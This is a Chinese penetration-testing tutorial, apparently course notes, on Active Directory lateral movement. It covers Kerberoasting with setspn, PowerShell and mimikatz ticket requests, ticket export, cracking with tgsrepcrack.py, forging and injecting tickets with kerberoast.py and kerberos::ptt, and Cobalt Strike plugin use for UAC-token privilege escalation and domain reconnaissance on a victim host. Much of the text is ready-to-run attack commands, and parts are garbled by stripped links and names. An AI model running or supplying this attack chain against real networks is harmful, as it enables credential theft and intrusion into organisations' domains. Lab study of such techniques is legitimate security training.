p69 内网安全-域横向 CobaltStrikeSPNRDP( 二 )


文章插图
# windows系统自带的setspn可以查询域内的SPNsetspn -q */*# 获取所有服务
2)查看指定服务的名称
例如:我们要攻击DNS服务,那就专门查看DNS的服务名
setspn -q */* | findstr "DNS"
# 首先打开cmd输入下面的命令清空之前凭证klist purge# 查看凭证列表,看是否删除成功了klist
请求(这里要用执行命令,cmd报错)
#Add-Type -AssemblyName System.IdentityModel# 请求DNS我这里是: DNS/WIN-I7NPA55KMBD.zs.comNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"# 或使用mimikatz去请求mimikatz.exe "kerberos::ask /target:xxxx"
再次查看凭证列表现在就有东西了
# 查看凭证列表klist
导出(导出刚才的票证信息)
这里要用都工具
官网: - /:一个玩安全的小工具
mimikatz.exe "kerberos::list /export"
破解
使用 .py 破解
项目地址:
# 用python运行脚本密码字典凭证的文件python tgsrepcrack.py passwd.txt xxxx.kirbipython .\tgsrepcrack.py .\passwd.txt .\2-40a40000-zhangsan@DNS~WIN-I7NPA55KMBD.zs.com-ZS.COM.kirbi
重写
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存
案例3-域横向移动测试流程一把梭哈-初体验
安装与使用可以参考我之前写的文章:(下面的内容我会写一些之前没有的CS操作)的安装与基础使用安装正经人_____的博客-CSDN博客
大概流程:
启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透
1)关于启动及配置讲解
我之前的文章有写,这里就不多说了
2)关于提权及插件加载 1、提权
说明:提权操作是目标有这个漏洞才能提权(如果你也不请求目标主机的漏洞是啥就一个个尝试),而且只能将账号(管理员)提权到账户(系统)
使用插件提权(这使用视频中老师推荐的插件) 先演示一下梼杌: - /taowu--
# 克隆插件到CS根目录git clone https://github.com/pandasec888/taowu-cobalt-strike.git
直接从上克隆因为网站是外国的容易断开报错,建议还是下载压缩包再拉进入
使用插件
修改一下执行时间,默认是60s才会执行操作
调好之后我们就可以使用这个插件的功能了,如:一键获取目标主机信息(主机硬件、域、ip、FTP等信息)
【p69 内网安全-域横向 CobaltStrikeSPNRDP】注意:下面的操作都是要先进入CS的命令行才能看到操作结果
使用插件的权限提升功能
操作都是中文的其他操作自己玩一会就知道了(注意:一定要调一下延时操作,不然默认是60s)
演示:
我的受害者主机是win7最终选择uac-token-提权成功
uac-token-是一种绕过uac方式的攻击,吧地权限提高到高权限,利用一个UAC漏洞,允许非提升进程使用提升进程中窃取的令牌来启动,适用于win7 (参考)
3)关于信息收集命令讲解
我感觉这些命令都不是很好用
net view# 查看目标的共享net computers# 查看域的成员net dclist shell net user /domain
建议还是使用查插件进行信息搜集
4)关于视图自动化功能讲解
操作都是中文的感觉没啥好写的
5)在受害者主机上传自己下载的第三方工具
如果你觉得CS自带的功能与插件无法满足你的需要时,你就可以上传你平时用得第三方工具,如:Ladon